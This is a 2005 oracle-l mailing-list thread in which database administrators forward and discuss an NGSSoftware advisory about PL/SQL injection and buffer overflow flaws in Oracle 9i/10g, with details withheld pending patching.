I just got the email from Oracle about this. I guess it's real. Ruth -----Original Message----- From: oracle-l-bounce@xxxxxxxxxxxxx [mailto:oracle-l-bounce@xxxxxxxxxxxxx]On Behalf Of Don Granaman Sent: Wednesday, January 19, 2005 10:30 AM To: rgramolini@xxxxxxxxxxxxxxx; oracle-l Subject: Re: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i This same "alert" was forwarded to me yesterday also. I could find no such patch - or any other related information on Metalink or OTN's security alerts. The most recent (unrelated) security alert I could find was from Dec 17, 2004. -Don Granaman ----- Original Message ----- From: "Ruth Gramolini" <rgramolini@xxxxxxxxxxxxxxx> To: "oracle-l" <oracle-l@xxxxxxxxxxxxx> Sent: Tuesday, January 18, 2005 11:52 AM Subject: FW: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS 10g/9i > I just received this from my SA, Claus. Has anyone applied this patchset? > Does anyone know the details. > > Inquiring minds what to know. > Ruth > > -----Original Message----- > From: Claus Lund [mailto:clund@xxxxxxxxxxxxxxx] > Sent: Tuesday, January 18, 2005 11:30 AM > To: Ruth Gramolini > Subject: FW: [VulnWatch] Multiple high risk vulnerabilities in Oracle > RDBMS 10g/9i > > > I don't know if you heard about this yet... > > -Claus > > -----Original Message----- > From: NGSSoftware Insight Security Research [mailto:nisr@xxxxxxxxxxxxx] > Sent: Tuesday, January 18, 2005 10:33 AM > To: bugtraq@xxxxxxxxxxxxxxxxx; ntbugtraq@xxxxxxxxxxxxxxxxxxxxxx; > vulnwatch@xxxxxxxxxxxxx > Subject: [VulnWatch] Multiple high risk vulnerabilities in Oracle RDBMS > 10g/9i > > > Researchers at NGSSoftware have discovered multiple high risk > vulnerabilities in the Oracle Database Server. Versions affected include > > Oracle Database 10g - All Releases > Oracle9i Database Server - All Releases > > The vulnerabilities include PL/SQL Injection vulnerabilities that allow low > privileged users to gain DBA privileges and a buffer overflow vulnerability. > The former can be exploited via the web through Oracle Application Server. > Oracle has released a patch set (18/01/2005) to address these issues. Oracle > database administrators are urged to download, test and install the patch > set as soon as possible. See http://metalink.oracle.com/ for more details. > > NGSSoftware are going to withhold details about these flaws for three > months. Full details will be published on the 18th of April 2005. This three > month window will allow Oracle database administrators the time needed to > test and apply the patch set before the details are released to the general > public. This reflects NGSSoftware's new approach to responsible disclosure. > > NGSSQuirreL for Oracle, NGSSoftware's advanced vulnerability assessment > scanner and security manager for Oracle, has been updated to check for and > positively identify these flaws in Oracle database servers on the network. > More information about NGSSQuirreL for Oracle can be found at > http://www.ngssoftware.com/squirrelora.htm. > > NGSSoftware Insight Security Research > http://www.ngssoftware.com/ > +44(0)208 401 0070 > > > > -- > //www.freelists.org/webpage/oracle-l -- //www.freelists.org/webpage/oracle-l -- //www.freelists.org/webpage/oracle-l